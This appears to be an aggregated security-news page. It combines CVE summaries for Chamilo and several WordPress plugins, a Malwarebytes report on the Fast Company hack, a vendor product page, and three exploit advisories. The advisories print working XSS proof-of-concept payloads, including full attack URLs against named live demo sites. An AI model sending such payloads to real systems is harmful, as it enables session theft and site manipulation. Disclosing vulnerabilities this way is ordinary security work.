A zip slip vulnerability in the file upload function of Chamilo v1.11 allows attackers to execute arbitrary code via a crafted Zip file.

CVE-2022-40407: Security issues - Chamilo LMS

Categories: Cybercrime
Categories: News
The US business magazine appeared to have two separate and related incidents in which it was compromised.



(Read more...)




The post Fast Company hacked to send obscene and racist messages appeared first on Malwarebytes Labs.

Yesterday, Apple News announced it had disabled the channel of Fast Company, a US-based business magazine, after surprised Twitter users reported it was tweeting offensive comments.

> An incredibly offensive alert was sent by Fast Company, which has been hacked. Apple News has disabled their channel.
> 
> — Apple News (@AppleNews) September 28, 2022

Fast Company was hacked on Sunday, September 25. The attacker responsible modified article titles to obscene and racist things:

"Hacked by Vinny Troia. \[redacted\] tongue my \[redacted\]", one title read.

  
This is what Fast Company looked like after it was hacked by an actor named "Thrax."

Fast Company took its site offline to fix the defacement but the hacker successfully got in again on Tuesday via content management system WordPress, in order to push the same offensive text to its followers on Apple News.

Fast Company tweeted on Wednesday:

> Fast Company's Apple News account was hacked on Tuesday evening. Two obscene and racist push notifications were sent about a minute apart.
> 
> The messages are vile and not in line with the content and ethos of Fast Company. (continued below)
> 
> — Fast Company (@FastCompany) September 28, 2022

On Thursday, Fast Company's website was displaying a statement regarding the hack on a black background.

  
"The messages are vile and are not in line with the content and ethos of Fast Company."

While the company is working to resolve what happened, it said it will continue publishing stories on its social channels, including Facebook, LinkedIn, and TikTok.

Speaking with BleepingComputer, "Thrax" revealed how they hacked Fast Company's website.

Thrax claimed they infiltrated Fast Company after bypassing basic HTTP authentication that secured the WordPress instance the company uses for their website. They then used a default password in "dozens" of accounts to take control of the CMS.

They then stole Auth0 tokens, Apple News API keys, and Amazon SES secrets. Using the tokens, "Thrax" says they created admin accounts on the CMS systems, which were then used to push out the notifications to Apple News.

Fast Company hacked to send obscene and racist messages

Motopress Hotel Booking Lite plugin version 4.4.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.4.2 - Stored Cross-Site Scripting (XSS)# Date: 2022-09-28# Exploit Author: Ali Alipour# Vendor Homepage: https://motopress.com/# Software Link: https://wordpress.org/plugins/motopress-hotel-booking-lite/# Version: 4.4.2# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/APoC:1: Install Latest WordPress2: Install and activate Latest Motopress Hotel Booking Lite (4.4.2).3: Navigate to Accommodation >> Services.4: Click on "Add New" button And Enter the JavaScript Payload in the Title Field : ( "><script>alert("XSS")</script> )5:Click on the publish button.6. Visit http://localhost/wp/services/7. XSS payload execute.

WordPress Motopress Hotel Booking Lite 4.4.2 Cross Site Scripting

WordPress Forym plugin version 1.5.7 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : forym.xyz                                                                  ││  Vendor   : codecanyon.net                                                             ││  Software : Forym 1.5.7 - Modern Discussion Forum for Wordpress                        ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 's' is vulnerable to XSShttps://forym.xyz/?s=ax0zq%22%3e%3cscript%3ealert(1)%3c%2fscript%3efkdbh[-] Done

WordPress Forym 1.5.7 Cross Site Scripting

WordPress Sabai Discuss plugin version 1.4.13 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : sabaidiscuss.com                                                           ││  Vendor   : Sabai Discuss                                                              ││  Software : Sabai Discuss - Q&A forum plugin V1.4.13 for WordPress                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'field_number[min]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[min]=33lnoiy%22%3e%3cscript%3ealert(1)%3c%2fscript%3epfucnGET parameter 'field_number[max]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[max]=33lnoiy%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3EpfucnGET parameter 'field_range[min]' is vulnerable to XSS https://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[min]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zmGET parameter 'field_range[max]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[max]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zm[-] Done

WordPress Sabai Discuss 1.4.13 Cross Site Scripting

The Scripts Organizer WordPress plugin before 3.0 does not have capability and CSRF checks in the saveScript AJAX action, available to both unauthenticated and authenticated users, and does not validate user input in any way, which could allow unauthenticated users to put arbitrary PHP code in a file

**Advanced Code editor for WordPress**

See Pricing

**Featured at:**

**Features List**

**Live Preview**

No need to have the website in a new tab and constantly reload the browser to see the changes. Press CTRL + S and reload changes on every save. Read more

**Add custom functionality to your WordPress by writing SCSS, CSS, JavaScript, PHP**

With Scripts Organizer you can write CSS, Java Script, HTML and PHP. The Header and the Footer blocks are HTML based and wrap scripts and styles in closing tags. In… Read more

**Safe mode**

No more fear for last-minute online edits. In case of something go wrong we got your back. After every save we are checking if the script is correct and in… Read more

**SCSS Partials**

Long CSS files can be long and important parts can not be reused. The solution to this is it split your CSS into parts and merge it with Scripts Organizer.… Read more

**Inject CSS and JS Location in Header or Footer**

By default when you create Code Block and you choose JS, CSS, or SCSS code will be generated as inline Script or Style. And that is great if you are… Read more

**Insert Oxygen's Global Colors**

Include Oxygen’s colors with only 1 click. No need to recreate or remember hex values anymore. Color will be included as Oxygen Builder native variable same as you would write… Read more

**Schedule Script Date**

Daily Easies way to explain this is that daily setting will be run every day without interruptions or any limit. Days This option will unlock the section below to choose… Read more

**Schedule Script Time**

All Day By the default “All Day” is selected and script will be running all day from 00:00 to 24:00. Time This option will unlock the section below to choose… Read more

**Scripts Manager**

With this powerful feature, you will be able to enqueue and register scripts and styles and trigger them the same way as any other code you are writing inside Scripts… Read more

**Exclude Conditions**

Have the option to select the entire website except: “Post types, Handpicked single posts, Taxonomies, or Terms.” Read more

**Code Editor**

With version 2.0 and above you will get Full Visual Studion code experience. We have integrated Monaco and with that, you will have a feeling like you never left the… Read more

**Export-Import**

Scripts Organizer We are using native WordPress post logic and with this, you can use WordPress post or pages “Export-Import” plugins. Having an extra plugin is a hassle so we… Read more

**Code Navigator**

Navigate fast between code blocks with sidebar list without leaving code editor. Code Navigator is available for Code Blocks and SCSS Partials. Code Block Navigator preview Code Block Navigator preview… Read more

**Organize Scripts**

Scripts List Since Scripts Organizer is WordPress native-oriented you can manage scripts the same as any other post or page. In the Scripts list, you can sort them by title… Read more

**Scripts Location**

What differs Scripts Organizer from others is that you can write Scripts and Styles inside Header and Footer and on top of that to write PHP Action or Hook or… Read more

**Shortcode**

Use flexibility to create one group of elements and reuse it across the website. Shortcode can be scheduled the same as scripts and styles. For best practice we limited shortcode… Read more

**Current Server Time**

When you are preparing scripts when to be triggered at an exact time it is important that your plan is synchronized with server time. This is especially important when you… Read more

**WordPress Native under the hood**

We are reusing using WordPress scripts, styles, classes, and functions to get the most of performance as you already loaded everything. With WordPress native look and feel learning curve will… Read more

**Themes**

Looking at the code all day long is hard so we are making constant improvements. From Dark to Light mode to switch between night and day for better contrast to… Read more

**Easy way to enable-disable scripts**

Scripts can be easily enabled-disabled by pressing toggle switch on two locations. The first one is when you editing the Scripts page. Scripts Planner > Scripts pages list > Selected… Read more

**REVIEW FROM WP EXPERTS**

_This is a very powerful plugin. Not only is it feature-rich and offers all the functionality I need, but it literally works every day for me that I use it. Developers are always listening to user suggestions, and by making changes regularly as they’re suggested, they make sure my experience stays strong. I am very pleased and lucky to have this plugin for my workflow._ 

**Andrew Choi**

Scheduling scripts on your WordPress site has never been more straightforward. With Scripts Organizer, you can schedule to run scripts (HTML, CSS, JS & PHP) only where they are needed when they are needed. Add CSS tweaks over Halloween & Black Friday for Visual Themeing or run your chatbot only during your working hours. You can pick a timeframe, select specific dates, weekdays, taxonomies & more. The scripts of your choice will be running only on the pages that match all of your specified conditions. Scripts Organizer gives you the power to schedule scripts in no time.

**Noel**

I was an early adopter of Swiss Knife Pro and Scripts Organizer and have had the privilege of watching both plugins mature into incredibly helpful tools. Both offer a unique set of features dedicated to saving WordPress creators time and augment the development experience. Aside from the features, the development and support are both best in class. The dPlugins team consistently pushes major and minor updates with helpful features, cosmetic improvements, and more. They have an active community of users and happily integrate popular requests that help users of their plugins. Support queries are answered quickly, professionally, and most importantly… actually help you solve your problem. As a WordPress Agency that uses Oxygen Builder for almost all of our projects, Swiss Knife Pro and Scripts Organizer have saved my team at Isotropic hundreds of hours in manual work, from debugging, to font management, to scheduling mission-critical scripts, and more!

**James LePage**

It paid off when I was going for my last vacation. I have scheduled a promotion banner and left my computer at home. That’s how much I trust him.

**Alexander Buzmakov**

**Unlimited websites****Unlimited support****Documentation and support****More features coming soon**

**Lifetime updates and support**

Price will rise as we add more features

**$65.00**

Buy Now:  $65.00

Payments are secured with Stripe and PayPal

**30-Day Money-Back Guarantee**

Probably you will never need this with our owesome products but here it is just in case. If you aren’t completely satisfied within 30 days of purchase, you’re more than welcome to get a full refund!

Contact support

CVE-2021-24890: Scripts Organizer | dplugins.com

The Restricted Site Access WordPress plugin before 7.3.2 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based limitations in certain situations.

CVE-2022-1613

The Generate PDF WordPress plugin before 3.6 does not sanitise and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2022-3070

The Slider Hero WordPress plugin before 8.4.4 does not escape the slider Name, which could allow high-privileged users to perform Cross-Site Scripting attacks.

CVE-2022-3074

The CM Download Manager WordPress plugin before 2.8.6 allows high privilege users such as admin to upload arbitrary files by setting the any extension via the plugin's setting, which could be used by admins of multisite blog to upload PHP files for example.

Tag

#wordpress